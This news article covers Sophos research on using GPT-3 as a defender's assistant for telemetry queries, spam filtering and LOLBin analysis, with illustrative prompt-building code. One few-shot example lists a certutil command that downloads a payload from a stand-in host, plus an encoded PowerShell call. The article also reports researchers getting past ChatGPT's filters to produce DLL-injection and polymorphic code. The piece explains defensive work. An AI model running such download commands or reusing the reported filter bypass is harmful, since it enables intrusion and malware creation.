A new research report published on Monday demonstrates how cybersecurity professionals can use GPT-3, the family of large language models underlying ChatGPT from Artificial Intelligence (AI) research firm OpenAI, as a co-pilot to help defeat attackers.
Sophos’ research details projects developed by its threat intelligence unit, Sophos X-Ops, that use GPT-3’s large language models to simplify the search for malicious activity in security software datasets, more accurately filter spam and speed up analysis of “living off the land” binary (LOLBin) attacks.
LOLBins are legitimate, non-malicious binaries native to the operating system that cyber criminals and crime groups exploit to conceal their malicious activity; certutil.exe, a built-in Windows certificate utility that can also be abused to download payloads, is a well-known example.
“Since OpenAI unveiled ChatGPT back in November, the security community has largely focused on the potential risks this new technology could bring,” said Sean Gallagher, principal threat researcher at Sophos, speaking on the new initiative. He said that Sophos researchers have been observing “AI as an ally rather than an enemy for defenders”, making it a cornerstone technology for cyber security professionals. “The security community should be paying attention not just to the potential risks, but the potential opportunities GPT-3 brings,” he said.
Sophos X-Ops researchers, including Sophos’ AI Principal Data Scientist Younghoo Lee, have been working on three prototype projects that show GPT-3’s potential as a cybersecurity defender’s assistant. All three employ a technique known as “few-shot learning” to train the AI model with only a few data samples, eliminating the need for a large volume of pre-classified data.
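Sophos has not published the exact prompts behind these prototypes, but few-shot learning in this setting typically amounts to prepending a handful of labelled examples to each query so the model can infer the task without any fine-tuning. A minimal, purely illustrative sketch (the function, examples and labels below are hypothetical, not Sophos’ actual prompts):

```python
# Minimal sketch of few-shot prompting: labelled examples are prepended
# to the new input so the model infers the task without fine-tuning.
# All names, examples and labels here are illustrative.

def build_few_shot_prompt(task_description, examples, query):
    """Assemble a prompt from a task description, (input, label) pairs,
    and the new input to be labelled by the model."""
    lines = [task_description, ""]
    for text, label in examples:
        lines.append(f"Input: {text}")
        lines.append(f"Label: {label}")
        lines.append("")
    lines.append(f"Input: {query}")
    lines.append("Label:")
    return "\n".join(lines)

# Hypothetical labelled samples for a command-line triage task.
examples = [
    ("powershell -enc SQBFAFgA", "suspicious"),
    ("svchost.exe -k netsvcs", "benign"),
]
prompt = build_few_shot_prompt(
    "Classify each command line as benign or suspicious.",
    examples,
    "certutil -urlcache -split -f http://example.com/payload.exe",
)
# `prompt` would then be sent to a GPT-3 completions endpoint, and the
# model's continuation read as the predicted label.
```

The appeal of this pattern, as the researchers note, is that two or three labelled samples stand in for the large pre-classified training sets that conventional machine learning models require.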
Sophos tested the few-shot learning method on a natural language query interface for sifting through malicious activity in security software telemetry; specifically, it tested the model against its endpoint detection and response (EDR) product. Defenders can use this interface to filter telemetry with simple English commands, without needing to understand SQL or the underlying structure of the database.
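The report does not describe Sophos’ prompt design, but a natural-language query interface of this kind can be built with the same few-shot pattern: pair example English questions with the SQL they should produce against the telemetry schema. A hypothetical sketch (the table, columns and example queries are invented for illustration and do not reflect Sophos’ EDR schema):

```python
# Hypothetical sketch of an English-to-SQL few-shot prompt for querying
# endpoint telemetry. Schema and examples are invented for illustration.

SCHEMA = ("Table process_events(timestamp, hostname, process_name, "
          "command_line, parent_process)")

EXAMPLES = [
    ("Show all PowerShell executions on host WS01",
     "SELECT * FROM process_events WHERE process_name = 'powershell.exe' "
     "AND hostname = 'WS01';"),
    ("Which processes were launched by winword.exe?",
     "SELECT process_name, command_line FROM process_events "
     "WHERE parent_process = 'winword.exe';"),
]

def english_to_sql_prompt(question):
    """Build a few-shot prompt asking the model to translate an English
    question into SQL over the schema above."""
    parts = [f"Schema: {SCHEMA}", ""]
    for q, sql in EXAMPLES:
        parts.append(f"Question: {q}")
        parts.append(f"SQL: {sql}")
        parts.append("")
    parts.append(f"Question: {question}")
    parts.append("SQL:")
    return "\n".join(parts)

prompt = english_to_sql_prompt(
    "List command lines run by certutil in the last day")
# The model's completion would be the SQL executed against the telemetry
# store, so the defender never writes SQL directly.
```

In a production system the generated SQL would of course need validation before execution, but the sketch shows why the approach removes the need for analysts to know the database layout.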
Sophos then tested a new spam filter using ChatGPT and discovered that, when compared to other spam filtering machine learning models, the filter using GPT-3 was significantly more accurate. Finally, Sophos researchers were able to develop a program that simplified the process of reverse-engineering LOLBins command lines. Such reverse engineering is notoriously difficult, but it is also critical for understanding LOLBins’ behavior — and preventing similar attacks in the future.
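For the spam filter, the same few-shot idea applies: a handful of labelled messages prime the model, and its completion is normalised to a spam/ham verdict. The sketch below is hypothetical (the messages and the parsing helper are invented); Sophos says its actual prototype code is available on its GitHub.

```python
# Hypothetical sketch of GPT-3-based spam filtering via few-shot
# examples. Messages and helper names are invented for illustration.

FEW_SHOT = [
    ("Congratulations! You have won a $1000 gift card. Click here.", "spam"),
    ("Can we move tomorrow's standup to 10am?", "ham"),
    ("URGENT: verify your account or it will be suspended", "spam"),
]

def spam_prompt(message):
    """Build a few-shot prompt classifying a message as spam or ham."""
    lines = ["Classify each message as spam or ham.", ""]
    for text, label in FEW_SHOT:
        lines += [f"Message: {text}", f"Label: {label}", ""]
    lines += [f"Message: {message}", "Label:"]
    return "\n".join(lines)

def parse_label(completion):
    """Normalise a raw model completion to 'spam' or 'ham'."""
    text = completion.strip().lower()
    return "spam" if text.startswith("spam") else "ham"
```

In practice the prompt would be sent to a completions endpoint and the start of the response normalised with `parse_label`; accuracy then depends heavily on which few-shot examples are chosen, which is where Sophos reports GPT-3 outperformed conventional spam-filtering models.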
“One of the growing concerns within security operations centres is the sheer amount of ‘noise’ coming in. There are just too many notifications and detections to sort through, and many companies are dealing with limited resources,” said Gallagher.
“We’ve proved that, with something like GPT-3, we can simplify certain labour-intensive processes and give back valuable time to defenders. We are already working on incorporating some of the prototypes above into our products, and we’ve made the results of our efforts available on our GitHub for those interested in testing GPT-3 in their own analysis environments. In the future, we believe that GPT-3 may very well become a standard co-pilot for security experts,” he added.
To be sure, other cyber security researchers have highlighted the impact of ChatGPT and GPT-4 on security professionals in recent months. According to Check Point Research, an Israeli cyber security firm, despite improvements in safety metrics, GPT-4 still poses the risk of being manipulated by cyber criminals to generate malicious code.
Cyber security experts have also warned that such risks may grow as security threats become more sophisticated, driven by GPT-4’s improved reasoning and language comprehension as well as its ability to generate long-form text, which can be used to write more complex code for malicious software.
Earlier, in January, CyberArk researchers detailed how they circumvented ChatGPT’s content filters and got it to generate what they called “functional code” to inject a DLL into explorer.exe. The researchers then used the chatbot to generate polymorphic code, which antimalware software finds difficult to detect and deal with.